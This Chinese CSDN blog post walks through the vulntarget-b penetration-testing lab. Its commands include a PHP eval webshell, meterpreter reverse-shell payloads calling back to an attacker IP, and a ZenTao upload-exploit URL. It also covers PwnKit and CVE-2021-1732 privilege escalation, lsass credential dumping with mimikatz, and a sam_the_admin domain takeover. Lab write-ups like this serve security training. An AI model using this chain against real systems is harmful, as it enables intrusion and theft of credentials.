vulntarget-b wp

已于 2023-07-03 09:15:46 修改
阅读量228 收藏
点赞数 2
文章标签: 安全 web安全 linux
于 2023-07-02 23:43:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shajianlong666/article/details/131507059
版权

拓扑:

外网渗透

信息收集

主机发现
arp-scan -l

端口扫描
nmap -sT -O -A -sV -p- -Pn 192.168.0.59

开放端口:21、22、80、81、888、3306、8888

操作系统Linux

渗透过程

端口探测
访问80端口

是个宝塔面板

访问81端口

CMS:极致CMS

直接点击登录

没有找到

访问888

被拒绝

访问8888

让我们输正确的入口登录宝塔

3306

不被允许连接

极致CMS后台拿shell
漏洞探测:

极致CMS后台:192.168.0.59:81/admin.php

弱口令:admin/admin123

极致CMS版本:v1.8.1

在网上搜索一圈发现,这个版本后台在线编辑模板插件存在getshell的洞

搜索在线编辑模板下载并安装

之后点击配置

设置密码登录后提交(账户密码随意)

我设置的是:admin/abcdefghijk

进入如下页面

点击登录

进入如下页面

找到index.php写入一句话木马

上线蚁剑并绕过disable_functions
蚁剑连接

绕过disable_functions

有些命令无法执行,应该是权限不足

提权
上线msf
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.0.13 LPORT=6666 -f elf > shell.elf

将生成的木马上传到蚁剑上线的机器

msf开启监听

msf6 > use exploit/multi/handler 
msf6 exploit(multi/handler) > set LhoST 192.168.0.13
msf6 exploit(multi/handler) > set LpoRT 6666
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run

蚁剑执行木马文件

Linux交互式终端
python -c 'import pty; pty.spawn("/bin/bash")'

使用msf一键提权
msf6 exploit(multi/handler) > search suggest
msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set session 7
msf6 post(multi/recon/local_exploit_suggester) > run

用第一个尝试提权

msf6 post(multi/recon/local_exploit_suggester) > use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set session 7
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run

成功拿到root权限

内网渗透

信息收集

查看刚刚拿下的机器的ip

内网ip:10.0.20.30

路由
run post/multi/manage/autoroute
run autoroute -p

socks代理进入内网扫描
msf6 > search socks
msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > run

扫描内网主机和端口
msf6 > use auxiliary/scanner/discovery/udp_sweep 
msf6 auxiliary(scanner/discovery/udp_sweep) > set RhOSTS 10.0.20.1-255
msf6 auxiliary(scanner/discovery/udp_sweep) > set threads 100
msf6 auxiliary(scanner/discovery/udp_sweep) > run

扫不出来

在/etc/proxychains4.conf中设置上面的socks代理

使用nmap扫描

proxychains nmap -sT -p- -O 10.0.20.0/24

win10 getshell&提权

分析

访问8080端口

┌──(kali㉿kali)-[~]
└─$ proxychains firefox

弱口令:admin/Admin123

禅道12.4.2存在任意文件上传漏洞

拿shell过程

写一个木马文件shell.php上传到已经拿下的机器上

<?php @eval($_POST['cmd']);phpinfo(); ?>

然后在拿下的机器上开启http服务

python -m SimpleHTTPServer 1234

base64编码转换HTTP需要大写,version随意

HTTP://10.0.20.30:1234/shell.php
SFRUUDovLzEwLjAuMjAuMzA6MTIzNC9zaGVsbC5waHA

最终访问

http://10.0.20.66:8080/index.php?m=client&f=download&version=1&link=SFRUUDovLzEwLjAuMjAuMzA6MTIzNC9zaGVsbC5waHA

木马路径:

http://10.0.20.66:8080/data/client/1/shell.php

蚁剑上线(要设代理)

域信息收集&提权
杀软探测
tasklist /svc

域环境探测
ipconfig /all

其它域信息无法得到

正向payload上线msf会话(失败)
msf > use exploit/multi/handler 
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp
// 正向payload
msf6 exploit(multi/handler) > set RhoST 10.0.20.66
msf6 exploit(multi/handler) > run
msf > msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=192.168.0.13 LPORT=4444 -f exe > shell.exe

将exe文件进行免杀处理(因为这个靶场出来好多年了,现在随便免杀处理就能过)

但是kali无法拿到shell(可能是防火墙规则的原因)

端口转发上线msf与提权

要想上线msf可以进行端口转发

Centos:./portmap -m 1 -p1 6000 -h1 10.0.20.30 -p2 5555 -h2 192.168.0.13 # 将10.0.20.30的6666端口转发到192.168.0.13的5555端口
kali:./portmap -m 1 -p1 5555 -h1 192.168.0.13 -p2 6666 -h2 192.168.0.13

然后kali监听6666端口

msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set Lport 6666
msf6 exploit(multi/handler) > run

msf生成木马

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.0.20.30 lport=6000 -f exe > 666.exe

将exe文件进行免杀处理

使用cve-2021-1732.exe文件进行提权并上线

使用方法:

cve-2021-1732.exe 666.exe

域信息收集
域控相关
systeminfo

域控:WIN-UH20PRD3EAO

ip:10.0.10.100

域管理员:Administrator

msf 抓取密码
meterpreter > load kiwi
meterpreter > kiwi_cmd privilege::debug
meterpreter > kiwi_cmd sekurlsa::logonPasswords

没什么有用的信息

查看进程,看看有没有域管理员启动的进程

ps

没有

路由
run post/multi/manage/autoroute
run autoroute -p

上传procdump,利用procdump导出lsass.dmp文件(为了获取win101用户的明文密码)

注:其实这里也可以用ntlm横向到win10,再改win101用户的密码

meterpreter > upload procdumpx64.exe C:/

procdumpx64.exe -accepteula -ma lsass.exe lsass.dmp

下载lsass.dmp文件
download C:/lsass.dmp

下载到本地后。mimikatz读取明文密码(网上的wp提供了这种方法,但是我没有成功)
mimikatz.exe "privilege::debug" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

或者用网站破解

拿域控(win2016)

Windows 域服务权限提升漏洞(CVE-2021-42287, CVE-2021-42278)

利用命令 , 前置条件:需要一个域用户账号密码

域名
任意域用户名 + 明文密码
域控ip
pip3 install -r requirements.txt
proxychains python3 sam_the_admin.py "vulntarget.com/win101:admin#123" -dc-ip 10.0.10.100 -shell

xxzjl
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
靶场-vulntarget-b
weixin_58602402的博客
06-21 379
2.开始后台GetShell,点击扩展管理–>插件列表–>找到在线编辑模板–>下载–>安装–>配置–>输入账户密码–>点击立即提交–>跳转到在线文件管理工具–>登录即可-----》失败,没有加载出插件来。6.通过执行上面的命令收集而来的信息,发现其是域内的低权限主机,在MSF上生成正向木马加壳免杀后通过蚁剑上传运行,注意需要将靶机上的防火墙关闭后才能反弹shell成功。1.访问以下地址可获取该CMS的版本,在网络上搜索该版本禅道CMS系统的漏洞,发现存在CNVD-C-2020-121325漏洞,直接复现!
Vulntarget-b
weixin_44339234的博客
12-22 489
vulutarget系列
VulnTarget-b
大熊
06-16 408
实验目标:拿下域控中的flag.txt学习目标:极致CMS相关漏洞/禅道CMS相关漏洞/隧道代理/免杀/CVE-2021-1732/CVE-2021-42287/CVE-2021-42278靶机下载:其中vulntarget-b为本次实验机器》》》靶机信息《《《
vulntarget-b
m0_46105229的博客
04-25 2502
文章目录前言一、centerOS71.扫描IP2.扫描服务3.漏洞利用二、win10域环境1.扫描IP2.漏洞利用三、域控Windows server2016总结 前言 靶场是vulntarget-b,环境可以自己百度下载 拓扑图: 一、centerOS7 1.扫描IP nmap -F 192.168.252.3-254 2.扫描服务 sudo nmap -sV -p 21-10000 192.168.252.151 浏览器访问http://192.168.252.151:81/,发现是一个极
all-in-one-wp-migration-file-extension.zip
04-07
《全面解析WordPress迁移插件:All-in-One WP Migration File Extension》 在WordPress的世界里,数据迁移是一项常见的任务,无论是为了网站备份、迁移至新的主机,还是进行开发测试,都需要高效且可靠的工具。All-...
all-in-one-wp-migration:多合一WP迁移-无限制importexport
04-09
《全面解析多合一WP迁移插件:实现无限导入与导出》 在WordPress的世界中,数据迁移是一项常见的任务,无论是为了备份、站点迁移还是多站点管理。"All In One WP Migration" 插件正是为此而生,它为用户提供了一种...
All-in-One WP Migration 插件
12-03
**All-in-One WP Migration 插件详解** 在WordPress的生态系统中,All-in-One WP Migration(全功能WordPress迁移)是一款至关重要的工具,它为用户提供了简便且全面的数据迁移解决方案。这款插件允许用户轻松地将...
wp-script-core
09-07
标签"wp-script-co"可能是一个简化的版本或者错误,完整的可能是"wp-script-core",用于标识与标题相关的关键词,帮助用户搜索和识别这个插件。在WordPress插件目录中,通常会用这样的标签来分类和组织插件。 **...
wp-statistics
06-01
【标题】"wp-statistics" 是一款专门为WordPress平台设计的统计分析插件,它提供了丰富的网站数据统计功能,帮助用户深入了解网站的访问情况和用户行为。 【描述】该压缩包包含的是可直接使用的WordPress插件文件,...
vulntarget漏洞靶场-vulntarget-b
aming小老弟
07-19 3165
vuln靶场
vulntarget-b 免杀火绒,多层域控内网靶场
最新发布
weixin_68408599的博客
12-31 1151
靶场环境:项目地址:涉及知识点:极致cms相关漏洞、禅道cms相关漏洞、隧道代理、免杀、CVE-2021-1732 、CVE-2021-42287/CVE-2021-42278kali攻击机 ip:192.168.127.129。
vulntarget】系列:vulntarget-b 练习WP
一只爱吃橙子的羊
07-12 909
vulntarget】靶场系列,vulntarget-b 练习WP,会持续更新……
vulntarget-b免杀上线
qq_59873505的博客
01-29 138
11111
vulntarget-b靶场详细通关记录
tpaer的博客
11-23 3143
vulntarget-b靶场最详细通关记录。
乌鸦安全2021年度文章合集
crowsec
02-09 1219
乌鸦安全精选原创文章合集,基本上大部分都是原创,当然还有一部分文章由其他师傅投稿提供,在此感谢各位师傅的投稿和帮助!
极致CMS 1.9.2 审计与渗透测试
feng的博客
04-05 4832
前言 昨天看了极致CMS1.7,今天再来看看极致CMS1.9版本修复了什么漏洞,哪些漏洞还能用,是不是还有新的东西。 下载链接: 极致CMS 这次我下的是1.9.2的稳定版。 下载到本地搭建一下环境,然后就是安装。安装的时候注意到了这里: 我记得1.7版本安装的时候管理员和密码默认都是空的让自己填,这里的话默认的管理员和密码格式大概是jizhicms加上四个数字,这玩意怎么说呢,说是弱口令叭,但是9999*9999也挺难爆的,去爆破还不如找洞舒服。 看看后台 安装好之后还是先进一下后台,登录那里发现验证码
Vulntarget靶场渗透笔记[持续更新中]
派大星的博客
04-08 6797
Vulntarget靶场渗透笔记 文章目录Vulntarget靶场渗透笔记靶场官方链接Vulntarget-aWriteup网络拓扑环境信息收集win7 MSF上线横向移动win2016cs上线msf上线域渗透域内提权 靶场官方链接 https://github.com/crow821/vulntarget Vulntarget-a Writeup vulntarget漏洞靶场系列(一) 渗透测试练习No.62 内网渗透 vulntarget-a Win7:win7/admin win2016:Admini
--wp--preset--color--black:这是什么
07-12
`--wp--preset--color--black` 是一个以双短横线开头的 CSS 自定义属性(CSS Custom Property)。 这个属性看起来是一个特定于某个平台或框架的命名约定,其中 `wp` 可能代表 WordPress,`preset` 可能代表预设,`...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

xxzjl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值